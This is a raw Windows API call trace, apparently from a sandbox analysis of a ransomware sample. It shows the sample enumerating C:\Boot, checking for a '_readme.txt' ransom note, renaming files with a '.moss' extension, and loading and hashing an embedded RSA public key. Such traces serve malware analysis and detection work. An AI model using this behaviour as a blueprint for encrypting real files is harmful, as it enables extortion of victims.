returned 1 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.940] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.940] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.940] PathFindFileNameW (pszPath="") returned="" [0173.940] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.940] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.940] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.940] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59ba0 | out: hHeap=0x2c0000) returned 1 [0173.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.941] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0173.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59ba0 | out: hHeap=0x2c0000) returned 1 [0173.941] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 1 [0173.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59ba0 [0173.941] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e3f49c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e3f49c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59ba0 | out: hHeap=0x2c0000) returned 1 [0173.941] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e3f49c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e3f49c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.941] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0173.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59ba0 [0173.941] PathFindExtensionW (pszPath="C:\\Boot\\BCD") returned="" [0173.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59ba0 | out: hHeap=0x2c0000) returned 1 [0173.941] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0173.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59ba0 [0173.941] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG") returned=".LOG" [0173.941] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0173.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59ba0 | out: hHeap=0x2c0000) returned 1 [0173.942] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0173.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59ba0 [0173.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3237b8 [0173.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59ba0 | out: hHeap=0x2c0000) returned 1 [0173.942] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG1") returned=".LOG1" [0173.942] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6cc [0173.942] GetFileSizeEx (in: hFile=0x6cc, lpFileSize=0xa13fb40 | out: lpFileSize=0xa13fb40*=0) returned 1 [0173.942] CloseHandle (hObject=0x6cc) returned 1 [0173.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.942] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="C:\\Boot\\BCD.LOG1.moss" (normalized: "c:\\boot\\bcd.log1.moss")) returned 1 [0173.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3237b8 | out: hHeap=0x2c0000) returned 1 [0173.943] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0173.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59ba0 [0173.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3237b8 [0173.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59ba0 | out: hHeap=0x2c0000) returned 1 [0173.943] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG2") returned=".LOG2" [0173.943] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6cc [0173.943] GetFileSizeEx (in: hFile=0x6cc, lpFileSize=0xa13fb40 | out: lpFileSize=0xa13fb40*=0) returned 1 [0173.944] CloseHandle (hObject=0x6cc) returned 1 [0173.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.944] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="C:\\Boot\\BCD.LOG2.moss" (normalized: "c:\\boot\\bcd.log2.moss")) returned 1 [0173.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3237b8 | out: hHeap=0x2c0000) returned 1 [0173.944] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0173.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59ba0 [0173.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3237b8 [0173.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59ba0 | out: hHeap=0x2c0000) returned 1 [0173.944] PathFindExtensionW (pszPath="C:\\Boot\\BOOTSTAT.DAT") returned=".DAT" [0173.944] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6cc [0173.945] GetFileSizeEx (in: hFile=0x6cc, lpFileSize=0xa13fb40 | out: lpFileSize=0xa13fb40*=65536) returned 1 [0173.945] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0xa490000 [0173.989] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.989] ReadFile (in: hFile=0x6cc, lpBuffer=0xa490000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xa13fb78, lpOverlapped=0x0 | out: lpBuffer=0xa490000*, lpNumberOfBytesRead=0xa13fb78*=0x26, lpOverlapped=0x0) returned 1 [0174.001] SetFilePointer (in: hFile=0x6cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0174.001] ReadFile (in: hFile=0x6cc, lpBuffer=0xa490000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xa13fb70, lpOverlapped=0x0 | out: lpBuffer=0xa490000*, lpNumberOfBytesRead=0xa13fb70*=0x10000, lpOverlapped=0x0) returned 1 [0174.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0174.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f3) returned 0x32b598 [0174.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0174.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0174.002] CryptAcquireContextW (in: phProv=0xa13fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xa13fa50*=0x31eaa0) returned 1 [0174.003] CryptCreateHash (in: hProv=0x31eaa0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xa13fa58 | out: phHash=0xa13fa58) returned 1 [0174.003] CryptHashData (hHash=0x35773c0, pbData=0x32b598, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0174.003] CryptGetHashParam (in: hHash=0x35773c0, dwParam=0x2, pbData=0x0, pdwDataLen=0xa13fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xa13fa54) returned 1 [0174.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x3574880 [0174.003] CryptGetHashParam (in: hHash=0x35773c0, dwParam=0x2, pbData=0x3574880, pdwDataLen=0xa13fa54, dwFlags=0x0 | out: pbData=0x3574880, pdwDataLen=0xa13fa54) returned 1 [0174.003] GetLastError () returned 0x0 [0174.003] SetLastError (dwErrCode=0x0) [0174.003] GetLastError () returned 0x0 [0174.003] SetLastError (dwErrCode=0x0) [0174.003] GetLastError () returned 0x0 [0174.003] SetLastError (dwErrCode=0x0) [0174.003] GetLastError () returned 0x0 [0174.004] SetLastError (dwErrCode=0x0) [0174.004] GetLastError () returned 0x0 [0174.004] SetLastError (dwErrCode=0x0) [0174.004] GetLastError () returned 0x0 [0174.004] SetLastError (dwErrCode=0x0) [0174.004] GetLastError () returned 0x0 [0174.004] SetLastError (dwErrCode=0x0) [0174.004] GetLastError () returned 0x0 [0174.004] SetLastError (dwErrCode=0x0) [0174.004] GetLastError () returned 0x0 [0174.004] SetLastError (dwErrCode=0x0) [0174.004] GetLastError () returned 0x0 [0174.004] SetLastError (dwErrCode=0x0) [0174.004] GetLastError () returned 0x0 [0174.004] SetLastError (dwErrCode=0x0) [0174.004] GetLastError () returned 0x0 [0174.004] SetLastError (dwErrCode=0x0) [0174.004] GetLastError () returned 0x0 [0174.004] SetLastError (dwErrCode=0x0) [0174.004] GetLastError () returned 0x0 [0174.004] SetLastError (dwErrCode=0x0) [0174.004] GetLastError () returned 0x0 [0174.004] SetLastError (dwErrCode=0x0) [0174.004] GetLastError () returned 0x0 [0174.004] SetLastError (dwErrCode=0x0) [0174.004] GetLastError () returned 0x0 [0174.004] SetLastError (dwErrCode=0x0) [0174.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58a20 [0174.004] GetLastError () returned 0x0 [0174.004] SetLastError (dwErrCode=0x0) [0174.005] GetLastError () returned 0x0 [0174.005] SetLastError (dwErrCode=0x0) [0174.005] GetLastError () returned 0x0 [0174.005] SetLastError (dwErrCode=0x0) [0174.005] GetLastError () returned 0x0 [0174.005] SetLastError (dwErrCode=0x0) [0174.005] GetLastError () returned 0x0 [0174.005] SetLastError (dwErrCode=0x0) [0174.005] GetLastError () returned 0x0 [0174.005] SetLastError (dwErrCode=0x0) [0174.005] GetLastError () returned 0x0 [0174.005] SetLastError (dwErrCode=0x0) [0174.005] GetLastError () returned 0x0 [0174.005] SetLastError (dwErrCode=0x0) [0174.005] GetLastError () returned 0x0 [0174.005] SetLastError (dwErrCode=0x0) [0174.005] GetLastError () returned 0x0 [0174.005] SetLastError (dwErrCode=0x0) [0174.005] GetLastError () returned 0x0 [0174.005] SetLastError (dwErrCode=0x0) [0174.005] GetLastError () returned 0x0 [0174.005] SetLastError (dwErrCode=0x0) [0174.005] GetLastError () returned 0x0 [0174.005] SetLastError (dwErrCode=0x0) [0174.005] GetLastError () returned 0x0 [0174.005] SetLastError (dwErrCode=0x0) [0174.006] GetLastError () returned 0x0 [0174.006] SetLastError (dwErrCode=0x0) [0174.006] GetLastError () returned 0x0 [0174.006] SetLastError (dwErrCode=0x0) [0174.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3aca110 [0174.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a58a20 | out: hHeap=0x2c0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3574880 | out: hHeap=0x2c0000) returned 1 [0174.006] CryptDestroyHash (hHash=0x35773c0) returned 1 [0174.006] CryptReleaseContext (hProv=0x31eaa0, dwFlags=0x0) returned 1 [0174.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b598 | out: hHeap=0x2c0000) returned 1 [0174.006] UuidCreate (in: Uuid=0xa13fa48 | out: Uuid=0xa13fa48) returned 0x0 [0174.006] UuidToStringA (in: Uuid=0xa13fa48, StringUuid=0xa13fa40 | out: StringUuid=0xa13fa40) returned 0x0 [0174.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3aca180 [0174.006] RpcStringFreeA (in: String=0xa13fa40 | out: String=0xa13fa40) returned 0x0 [0174.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aca110 | out: hHeap=0x2c0000) returned 1 [0174.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3aca110 [0174.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10000) returned 0x3ad6e00 [0174.008] SetFilePointer (in: hFile=0x6cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0174.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aca180 | out: hHeap=0x2c0000) returned 1 [0174.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x32b598 [0174.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3aca180 [0174.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x32b790 [0174.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x3aa8c20 [0174.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa00b0 [0174.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0174.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3abd3f0 [0174.008] 